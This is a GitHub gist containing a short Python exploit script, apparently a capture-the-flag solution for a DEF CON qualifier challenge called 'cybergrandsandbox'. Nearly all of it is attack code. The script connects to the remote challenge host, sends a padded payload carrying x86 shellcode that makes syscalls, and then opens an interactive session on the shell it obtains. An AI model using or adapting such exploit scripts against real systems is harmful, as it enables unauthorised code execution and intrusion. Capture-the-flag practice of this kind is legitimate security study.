| #!/usr/bin/python | |
| from Pwning import * | |
| # customs when binary doesn't have nx eable or mprotect/nmap is on got table | |
| # from Shellcode import * | |
| # edit Templet with your own Name | |
| class CGC(Payload): | |
| def __init__(self): | |
| Payload.__init__(self) | |
| self.host[1] = 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me' # my Target host | |
| self.port = 4347 # my Target port | |
| self.mode = 0 # x86 target platform | |
| # self.mode = 1 x86_64 target platform | |
| self.conn = Telnet(self.host[1],self.port) | |
| # ok i go to pwn it :D | |
| def pwnTarget(self): | |
| self.conn.read_until('> ') | |
| pl = '0x41 '*285 | |
| pl+= "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41" | |
| pl+= ') '*25 | |
| self.conn.write(pl + '\n') | |
| self.conn.interact() # pwn the shell | |
| cgc = CGC() | |
| cgc.pwnTarget() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment